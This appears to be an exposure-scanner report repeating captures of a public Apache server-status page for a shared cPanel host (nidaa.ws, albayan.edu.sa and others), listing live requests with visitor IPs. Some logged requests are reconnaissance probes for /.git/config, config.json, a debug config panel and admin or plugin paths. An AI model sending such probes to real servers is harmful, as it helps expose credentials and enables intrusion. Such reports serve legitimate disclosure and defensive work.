      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-6131530/606/5209_
      73.19182535210320.040.22664.05
      52.230.152.12http/1.1garndhabi.org:80GET /up//upload//webarch/js/webarch/js/webarch/js/assets/js/cha
      
      0-6131530/432/4415_
      73.19113320118140.034.21569.54
      52.230.152.12http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/551/4888_
      73.1823424225720.029.20650.92
      51.253.138.48http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-6131530/550/4698_
      73.191528351298820.048.90592.09
      52.230.152.12http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/539/4771_
      73.2001545768140.039.13749.06
      52.230.152.12http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/569/4582_
      73.17283041702230.0134.30799.73
      52.230.152.152http/1.1garndhabi.org:80GET /up//upload//webarch/js/webarch/js/webarch/js/assets/plugin
      
      0-6131530/498/4705_
      73.0413725335288100.033.12593.83
      172.70.156.144http/1.1qr.brunch.ws:443GET /storage/food_image/17088520372966_imgf79a670a48a54b12aa39b
      
      0-6131530/542/4497_
      73.1477526989770.0120.54747.02
      172.70.156.150http/1.1qr.brunch.ws:443GET /storage/food_image/17162870612779_sparklingwatersmall.jpg 
      
      0-6131530/586/5248_
      73.1981341722550.071.68787.38
      52.230.152.12http/1.1garndhabi.org:80GET /up//upload//webarch/js/webarch/js/assets/plugins/pace/asse
      
      0-6131530/487/4619_
      73.1291533849510.090.41865.50
      172.70.156.136http/1.1qr.brunch.ws:443GET /storage/food_image/17162858719396_iceespresso.jpg HTTP/1.1
      
      0-6131530/633/4459_
      73.04137270228319670.063.24566.02
      172.70.156.145http/1.1qr.brunch.ws:443GET /storage/food_image/17088523246974_imge10c33bc297a444884398
      
      0-6131530/556/5234_
      73.06121126120830.061.97488.17
      157.55.39.200http/1.1albayan.edu.sa:443GET /imgweb/spelling%205.pdf HTTP/1.1
      
      0-6131530/559/4721_
      73.0513727139896260.0106.331014.32
      172.70.156.148http/1.1qr.brunch.ws:443GET /storage/food_image/17088572059401_img6304284a8afa40bd9a29a
      
      0-6131530/521/4738_
      73.1627229361950.059.24826.90
      51.253.181.151http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font1/DroidKufi-Bold.woff HTTP/1.1
      
      0-6131530/581/4925_
      73.0313737249513490.090.98664.13
      172.70.156.134http/1.1qr.brunch.ws:443GET /storage/category_image/17098160489744_2.png HTTP/1.1
      
      0-6131530/516/4557_
      73.0513726921746730.077.51701.91
      172.70.156.157http/1.1qr.brunch.ws:443GET /storage/food_image/17095846052706_croissantegg.jpg HTTP/1.
      
      0-6131530/537/4495_
      73.18243027001880.065.90777.58
      52.230.152.152http/1.1garndhabi.org:80GET /up//upload//webarch/js/webarch/js/webarch/js/assets/plugin
      
      0-6131530/531/4733_
      73.200262479090.099.14732.25
      172.70.189.26http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-6131530/564/4984_
      73.181990223664110.027.88711.76
      52.230.152.62http/1.1zed.sa:80GET / HTTP/1.1
      
      0-6131530/535/4749_
      73.0999732917830.099.42647.49
      172.70.156.143http/1.1qr.brunch.ws:443GET /storage/food_image/17088536517355_imge12175a5596244dd9127e
      
      0-6131530/550/4559_
      73.14826201428180.0135.58644.46
      172.70.156.152http/1.1qr.brunch.ws:443GET /storage/food_image/17162863763766_turkishcoffee.jpg HTTP/1
      
      0-6131531/640/4854K
      73.202122833440.832.45649.53
      162.158.107.17http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-6131530/757/4850_
      73.1439030673250.0107.78769.55
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-6131530/604/4937_
      73.18192028399140.073.42630.88
      52.230.152.12http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/602/4878_
      73.1192524942100.0132.44835.60
      172.70.156.130http/1.1qr.brunch.ws:443GET /storage/food_image/17096788308104_apple.webp HTTP/1.1
      
      1-6135160/519/4180_
      70.9513040042858680.037.51795.40
      173.252.107.6http/1.1albayan.edu.sa:443GET /imgweb/files40/mo_madrasati.mp4 HTTP/1.1
      
      1-6135160/562/4540_
      71.0091543405620.0111.19776.86
      172.70.156.156http/1.1qr.brunch.ws:443GET /storage/food_image/17162859544056_greenteacup.jpg HTTP/1.1
      
      1-6135160/485/4714_
      71.07151336130830.057.60737.27
      52.230.152.12http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-6135160/552/4660_
      71.07113032276060.035.02645.60
      52.230.152.12http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      1-6135160/501/4440_
      70.96107432416890.0170.66735.53
      172.70.156.140http/1.1qr.brunch.ws:443GET /storage/food_image/17085200704718_img7ebc48f2ebc54b16b5c7c
      
      1-6135160/549/4389_
      71.0091527846750.0125.48640.22
      172.70.156.141http/1.1qr.brunch.ws:443GET /storage/food_image/17162859714946_earlygrayteacup.jpg HTTP
      
      1-6135160/568/4567_
      71.061594554679420.0122.597
      Found on 2024-05-30 19:27
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314065fd9dc2

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 30-May-2024 15:17:40 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 7
      Parent Server MPM Generation: 6
      Server uptime:  7 days 11 hours 12 minutes 50 seconds
      Server load: 0.01 0.05 0.07
      Total accesses: 1026622 - Total Traffic: 146.7 GB - Total Duration: 1116692289
      CPU Usage: u652.5 s85.12 cu4224 cs945.69 - .916% CPU load
      1.59 requests/sec - 238.4 kB/second - 149.8 kB/request - 1087.73 ms/request
      16 requests currently being processed, 0 workers gracefully restarting, 209 idle workers
      ____________________K_________________K__R__W_______________K___
      ____K_________K___K__________________________________________WWW
      WWWWWWWWWWWWWWWWWWWWWW___K___________K_________.................
      ........__________________KK___________K_________________K______
      ____________R___K__.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-6131530/462/5065_
      53.23267234844670.029.79653.61
      104.254.244.98http/1.1php.we3dvi.com:443GET /wp-includes/random_compat/index.php HTTP/1.1
      
      0-6131530/343/4326_
      53.339018807010.016.23551.56
      31.167.49.14http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      0-6131530/413/4750_
      53.10407222178640.018.19639.91
      104.254.244.98http/1.1php.we3dvi.com:443GET /wp-admin/user/index.php HTTP/1.1
      
      0-6131530/351/4499_
      53.33180350991550.040.36583.54
      178.86.65.177http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      0-6131530/401/4633_
      53.301244445095060.028.29738.23
      66.249.64.12http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1748&l_n=1&page=1 HTTP
      
      0-6131530/411/4424_
      53.2129673138513800.0126.99792.43
      66.249.64.12http/1.1albayan.edu.sa:443GET /imgweb/cur1439/3/grawrist2.pdf HTTP/1.1
      
      0-6131530/404/4611_
      53.3411334438990.021.04581.74
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-6131530/417/4372_
      53.3156026708300.079.75706.23
      66.249.64.8http/1.1albayan.edu.sa:80GET /imgweb/ttll3.pdf HTTP/1.1
      
      0-6131530/368/5030_
      52.95140113637529920.063.32779.02
      151.255.15.109http/1.1
      
      0-6131530/359/4491_
      53.23239230048520.040.79815.88
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717071220.47563791275024414062
      
      0-6131530/386/4212_
      53.163542228162320.055.89558.67
      162.158.110.202http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-6131530/413/5091_
      53.17353325390170.016.89443.09
      66.249.70.64http/1.1sulaimaniya.edu.sa:443GET /wp-includes/css/dashicons.min.css?ver=6.5.3 HTTP/1.1
      
      0-6131530/393/4555_
      53.271723137617000.056.86964.84
      31.167.155.134http/1.1erp.3dvi.com:443GET /Show_price.php HTTP/1.1
      
      0-6131530/426/4643_
      53.25200428906040.044.88812.55
      31.167.155.134http/1.1erp.3dvi.com:443GET /favicon.ico HTTP/1.1
      
      0-6131530/433/4777_
      53.3321236660880.018.25591.40
      93.178.11.113http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-6131530/403/4444_
      53.12374521604480.027.05651.44
      66.249.64.8http/1.13dvi.com:443GET /css/ar/floating-wpp.css HTTP/1.1
      
      0-6131530/436/4394_
      53.16353126715790.057.97769.65
      172.69.151.234http/1.1nidaa.ws:80GET /s/93e26393e2431313e2838313/_/;/META-INF/maven/com.atlassia
      
      0-6131530/390/4592_
      53.153681549134440.078.66711.77
      66.249.70.6http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-6131530/391/4811_
      52.921047023408620.020.20704.07
      31.167.155.134http/1.1
      
      0-6131530/372/4586_
      53.311034032538570.088.14636.20
      34.246.121.121http/1.1albayan.edu.sa:443GET /web/250.html2 HTTP/1.1
      
      0-6131531/451/4460K
      53.35022004909866.6130.07638.96
      172.70.250.140http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-6131530/468/4682_
      53.291362422635480.015.37632.44
      66.249.64.132http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=1 HTTP/1.1
      
      0-6131530/641/4734_
      53.094129021729397810.069.51731.28
      78.95.157.62http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-6131530/431/4764_
      53.22277328155850.067.97625.42
      2.90.162.210http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-6131530/424/4700_
      53.17310024707760.0103.18806.35
      66.249.64.10http/1.1albayan.edu.sa:80GET /web/250.html2 HTTP/1.1
      
      1-6135160/397/4058_
      49.68377541968410.020.93778.82
      66.249.70.165http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=1864 HTTP/1.1
      
      1-6135160/419/4397_
      49.84274241574120.011.54677.22
      104.254.244.98http/1.1php.we3dvi.com:443GET /wp-includes/PHPMailer/index.php HTTP/1.1
      
      1-6135160/373/4602_
      49.9160235910750.042.85722.53
      66.249.64.12http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-6135160/385/4493_
      49.733641531517760.022.04632.62
      60.13.138.145http/1.1trynidaa.com:443GET /gaocc/g445g HTTP/1.1
      
      1-6135160/352/4291_
      49.948032171770.0114.07678.93
      31.167.49.14http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      1-6135160/349/4189_
      49.9413132826788820.0100.70615.45
      66.249.70.131http/1.1akg.sa:443GET /?credential=9508835272&phqEnnv68C=414675 HTTP/1.1
      
      1-6135160/408/4407_
      49.89132153561210.021.28680.72
      172.69.223.154http/1.1adyar.com.sa:443GET /.git/config HTTP/1.1
      
      1-6135160/391/4370_
      49.68407603501699
      Found on 2024-05-30 12:17
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140b50d9151

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Wednesday, 29-May-2024 20:59:21 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  6 days 16 hours 54 minutes 31 seconds
      Server load: 0.07 0.14 0.18
      Total accesses: 908106 - Total Traffic: 133.2 GB - Total Duration: 1005443550
      CPU Usage: u476.46 s55.63 cu3839.66 cs835.84 - .899% CPU load
      1.57 requests/sec - 241.0 kB/second - 153.8 kB/request - 1107.19 ms/request
      17 requests currently being processed, 0 workers gracefully restarting, 208 idle workers
      ___________________K___W________________________K_..............
      ....................................________KK_______W_______WWW
      WWWWWWWWWWWWWWWWWWWWWW_K______K___K______________________K______
      _____________K____________________K_______________K_____________
      ___K__R________K_____________________K______....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-592140/60/4456_
      11.44126032535480.04.81617.86
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=1&q=376&t=167.114.116.25&c=5 HTT
      
      0-592140/72/3863_
      11.40167017104600.011.64517.96
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=2&q=571&t=5.9.112.210&c=5 HTTP/1
      
      0-592140/89/4175_
      11.5039466120169280.05.97588.80
      37.237.208.10http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/1E3A0858-scaled.jpg HTTP/1.1
      
      0-592140/104/4023_
      11.382150349937230.024.34535.64
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=1&q=336&t=144.76.60.198&c=5 HTTP
      
      0-592140/57/4107_
      11.41141043976030.03.71700.84
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=775&t=62.210.251.247&c=5 HTTP
      
      0-592140/71/3877_
      11.31285032159410.01.77659.53
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=1&q=334&t=95.216.9.239&c=5 HTTP/
      
      0-592140/85/4090_
      11.44132503931541020.07.91551.26
      5.110.243.186http/1.1albayan.edu.sa:443GET /imgweb/msr5.JPG HTTP/1.1
      
      0-592140/58/3843_
      11.37241525394780.02.65621.50
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=5&q=764&t=5.9.70.72&c=5 HTTP/1.1
      
      0-592140/79/4524_
      11.4687031746350.034.32689.57
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=530&t=167.114.103.160&c=5 HT
      
      0-592140/65/4063_
      11.38201028090250.024.69727.37
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=768&t=95.216.14.211&c=5 HTTP/
      
      0-592140/108/3688_
      11.411506224360160.01.63469.01
      195.191.219.130http/1.1albayan.edu.sa:443GET /e_sch/code/forum/db.php?j=2&q=572&t=144.76.3.131&c=5 HTTP/
      
      0-592140/79/4481_
      11.5035024199940.04.86410.67
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=539&t=158.69.23.126&c=5 HTTP
      
      0-592140/85/4045_
      11.37227034511330.035.72903.23
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=1&q=335&t=95.216.9.239&c=5 HTTP/
      
      0-592140/54/4114_
      11.48792625730140.02.92762.82
      176.100.243.133http/1.1jawad.com.sa:443GET /ar HTTP/1.1
      
      0-592140/71/4238_
      11.33276535498200.031.90565.45
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=5&q=763&t=62.138.2.243&c=5 HTTP/1
      
      0-592140/79/3920_
      11.4850018422360.05.19617.64
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=531&t=5.9.140.242&c=5 HTTP/1
      
      0-592140/72/3842_
      11.4782622761660.033.09698.17
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=5&q=778&t=172.241.112.83&c=5 HTTP
      
      0-592140/77/4118_
      11.39180327414180.023.80609.83
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/forum/db.php?j=1&q=338&t=5.9.98.234&c=5 HTTP/1.
      
      0-592140/64/4299_
      11.44114022693540.020.86676.83
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=527&t=69.30.226.234&c=5 HTTP
      
      0-592142/87/4114K
      11.511531540306.79.01540.73
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=5&q=788&t=5.9.107.211&c=5 HTTP/1.
      
      0-592140/94/3917_
      11.342762198686250.06.64494.91
      93.112.144.3http/1.1albayan.edu.sa:443GET /web/images/logo_school.png HTTP/1.1
      
      0-592140/94/4047_
      11.5012020057400.08.64605.27
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=786&t=69.30.226.234&c=5 HTTP/
      
      0-592140/85/3996_
      11.401765326806860.010.37628.99
      66.249.64.12http/1.1albayan.edu.sa:443GET /e_sch/forum_replies.php?user=web2&i_f=551&page=1 HTTP/1.1
      
      0-592140/81/4211W
      11.300023261260.04.85553.08
      162.158.95.129http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-592140/66/4177_
      11.33280286222485240.010.13696.11
      114.119.141.112http/1.1daris.live:443GET /product/13 HTTP/1.1
      
      1-556500/73/3567_
      14.89177040530880.03.25747.10
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=2&q=566&t=195.191.219.133&c=5 HT
      
      1-556500/70/3892_
      14.9918036877440.01.78615.21
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=3&q=539&t=195.191.219.133&c=5 HT
      
      1-556500/115/4147_
      14.77248031819460.027.06674.25
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=2&q=539&t=88.198.33.145&c=5 HTTP
      
      1-556500/106/3999_
      13.79194230387430.013.14602.00
      213.244.116.238http/1.1
      
      1-556500/110/3841_
      14.81225029183080.032.06547.34
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/
      Found on 2024-05-29 17:59
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140a8b72c9a

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Wednesday, 29-May-2024 19:27:27 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  6 days 15 hours 22 minutes 37 seconds
      Server load: 0.08 0.08 0.06
      Total accesses: 898033 - Total Traffic: 131.8 GB - Total Duration: 997229372
      CPU Usage: u424.63 s45.97 cu3839.66 cs835.84 - .897% CPU load
      1.57 requests/sec - 240.8 kB/second - 153.9 kB/request - 1110.46 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 214 idle workers
      ______________K_________________________________K_..............
      ....................................________________________KWWW
      WWWWWWWWWWWWWWWWWWWWWW_____________________W____________K_______
      _____________________K____________________K___________________R_
      _______K__________________K__________W______....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-592140/25/4421_
      5.2547232492830.01.53614.58
      145.82.2.70http/1.1
      
      0-592140/28/3819_
      5.32249417089110.09.96516.29
      167.235.252.127http/1.1sulaimaniya.edu.sa:443GET /wp-content/plugins/blog-designer-pack/assets/js/bdp-public
      
      0-592140/26/4112_
      5.15191119990720.01.95584.77
      107.178.238.55http/1.1
      
      0-592140/32/3951_
      5.4293457349726330.01.25512.54
      142.154.86.160http/1.1albayan.edu.sa:443GET /imgweb/1445/9th%20BS%20QB%20T3-2024.pdf HTTP/1.1
      
      0-592140/26/4076_
      5.497343056180.01.92699.05
      159.89.12.166http/1.1hawsab.me:80GET / HTTP/1.1
      
      0-592140/46/3852_
      5.411033932146120.01.37659.13
      66.249.64.14http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1735&l_n=1&page=1 HTTP
      
      0-592140/42/4047_
      5.381571431316820.01.40544.75
      66.249.70.163http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=2753 HTTP/1.1
      
      0-592140/28/3813_
      5.3321036425361140.01.85620.69
      145.224.74.91http/1.1albayan.edu.sa:443GET /imgweb/book/mawsoaejaz.pdf HTTP/1.1
      
      0-592140/42/4487_
      5.4486130764080.031.00686.25
      51.211.17.231http/1.1albayan.edu.sa:443GET /e_sch/images/stars.png HTTP/1.1
      
      0-592140/32/4030_
      5.48322528032880.022.34725.01
      103.114.89.202http/1.13dvi.com:443GET / HTTP/1.1
      
      0-592140/65/3645_
      5.151882224344330.00.35467.73
      107.178.238.55http/1.1
      
      0-592140/33/4435_
      5.495024173350.01.58407.40
      159.89.12.166http/1.1hawsab.me:80GET /login.action HTTP/1.1
      
      0-592140/52/4012_
      5.10214234161940.011.30878.81
      31.166.155.134http/1.1
      
      0-592140/20/4080_
      5.49304125667830.00.65760.56
      103.114.89.202http/1.13dvi.com:443GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1
      
      0-592141/25/4192K
      5.4902352037366.628.47562.02
      172.71.250.124http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-592140/42/3883_
      5.30291018352040.02.72615.16
      66.249.64.10http/1.1albayan.edu.sa:80GET /imgweb/file42/%D9%85%D8%A7%D8%AF%D8%A9%20%D8%A7%D9%84%D8%A
      
      0-592140/51/3821_
      5.47322322624890.01.56666.64
      103.114.89.202http/1.13dvi.com:443GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1
      
      0-592140/35/4076_
      5.4011633427392480.022.00608.03
      175.110.195.177http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-592140/22/4257_
      5.3518921419738510.06.80662.77
      31.166.206.197http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-592140/35/4062_
      5.341963730828120.02.61534.33
      35.222.190.7http/1.1jilani.com.sa:443GET /api/v0.1/app/get-info-list-with-type?type=6 HTTP/1.1
      
      0-592140/47/3870_
      5.391209198664510.05.14493.42
      175.110.195.177http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-592140/43/3996_
      5.37172320017500.04.25600.88
      142.154.86.160http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-592140/30/3941_
      5.33196026682680.03.19621.81
      34.222.18.206http/1.13dvi.com:80GET / HTTP/1.1
      
      0-592140/34/4164_
      5.47483078723228200.02.64550.87
      145.82.2.70http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/2ItjUr1EFSfFWaFbZtbfvE
      
      0-592140/35/4146_
      5.4653322379520.01.54687.52
      175.110.195.177http/1.1albayan.edu.sa:443GET /school/albayan_images/1111.jpg HTTP/1.1
      
      1-556500/32/3526_
      8.641142840429670.01.87745.72
      145.82.2.70http/1.1jawad.com.sa:443GET / HTTP/1.1
      
      1-556500/23/3845_
      8.522329836869270.00.81614.24
      168.149.32.46http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      1-556500/40/4072_
      8.58176327173960.05.73652.92
      168.149.32.46http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-556500/67/3960_
      8.3732330362530.03.82592.67
      193.186.4.95http/1.1
      
      1-556500/58/3789_
      8.5917124029134200.028.83544.12
      151.254.206.146http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-556500/46/3658_
      8.6411751622957660.020.09506.29
      175.110.195.177http/1.1albayan.edu.sa:443GET /images/slider/03.jpg HTTP/1.1
      
      1-556500/101/3825_
      8.72322331883770.040.76591.00
      103.114.89.202http/1.13dvi.com:443GET / HTTP/1.1
      
      1-556500/39/3800_
      8.735130039450.05.40512.77
      159.89.12.166http/1.1hawsab.me:80GET /config.json HTTP/1.1
      
      1-556500/46/3569_
      8.57190333704460.012.59524.00
      31.166.206.197http/1.1albayan.edu
      Found on 2024-05-29 16:27
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140a338342e

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 28-May-2024 16:49:25 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  5 days 12 hours 44 minutes 35 seconds
      Server load: 0.62 0.49 0.45
      Total accesses: 766698 - Total Traffic: 107.6 GB - Total Duration: 812137721
      CPU Usage: u298.62 s24.82 cu3303.34 cs721.61 - .91% CPU load
